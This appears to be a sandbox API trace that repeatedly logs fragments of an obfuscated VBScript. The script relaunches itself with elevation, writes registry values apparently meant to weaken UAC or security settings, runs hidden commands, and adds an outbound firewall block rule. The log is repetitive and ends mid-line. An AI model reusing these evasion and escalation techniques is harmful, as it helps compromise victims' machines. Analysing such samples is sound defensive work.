bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 69 [0222.992] wcsncmp (_String1="DQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.992] wcsncmp (_String1="QFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 68 [0222.992] wcsncmp (_String1="FPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.993] wcsncmp (_String1="PEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0222.993] wcsncmp (_String1="EBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 